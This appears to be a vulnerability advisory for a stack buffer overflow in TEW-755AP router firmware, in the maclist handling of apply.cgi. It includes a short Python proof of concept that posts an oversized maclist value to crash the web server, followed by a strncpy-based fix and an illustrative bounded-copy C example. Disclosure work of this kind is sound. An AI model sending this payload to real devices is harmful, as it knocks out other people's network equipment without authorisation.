We found a stack buffer overflow vulnerability in the **TEW-755AP** (firmware version TEW755AP-FW113B01.bin).
In the handler function for the action kick_ban_wifi_mac_allow (sub_415B00) in the file /www/cgi/ssi, the value of qcawifi.wifi%d_vap%d.maclist is copied directly into a stack buffer via strcpy at line 25 without a size check. An attacker can overflow the stack buffer by supplying a very long string as qcawifi.wifi%d_vap%d.maclist.
PoC
```python
import requests

# Web interface of the test device
url = "http://192.168.17.221:80/apply.cgi"
cookie = {"Cookie": "uid=1234"}
# Oversized maclist value for the kick_ban_wifi_mac_allow handler
data = {'action': "kick_ban_wifi_mac_allow",
        "qcawifi.wifi1_vap12.maclist": "a" * 0x1000}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)
```
We use Python to send a crafted HTTP POST request to the web server and print the response.
When the crafted HTTP request is sent, the server returns a 502 error code.
Fix Suggestion:
Use strncpy to avoid the buffer overflow.
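
The following is an added example, not the firmware's code: a bounded copy built on strncpy that rejects an oversized maclist value and always NUL-terminates the destination. The function names and the 256-byte buffer size are assumptions, since the page does not give the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Assumed size: the real stack buffer size is not stated on the page. */
#define MACLIST_BUF_SIZE 256

/* Pattern described in the advisory (shown only as a comment):
 *     char buf[MACLIST_BUF_SIZE];
 *     strcpy(buf, maclist);   // writes past buf when strlen(maclist) >= sizeof(buf)
 */

/* Bounded copy (hypothetical helper). Returns 0 on success, -1 if src is
 * NULL or does not fit in dst including the terminating NUL. */
int copy_maclist(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src without reading more than dst_size bytes of it. */
    while (len < dst_size && src[len] != '\0')
        len++;
    /* Reject instead of silently truncating a MAC list mid-entry. */
    if (len == dst_size)
        return -1;

    /* strncpy alone does not terminate dst when src fills the whole
     * count, so copy at most dst_size - 1 bytes and terminate explicitly. */
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return 0;
}

/* Hypothetical handler fragment: stop processing when the value is too long. */
int handle_maclist(const char *maclist, char *out, size_t out_size)
{
    char buf[MACLIST_BUF_SIZE];

    if (copy_maclist(buf, sizeof(buf), maclist) != 0)
        return -1;              /* caller returns an error response */
    return copy_maclist(out, out_size, buf);
}
```

Replacing strcpy with strncpy only helps when the count is the destination size, not the source length, and when the result is terminated as above.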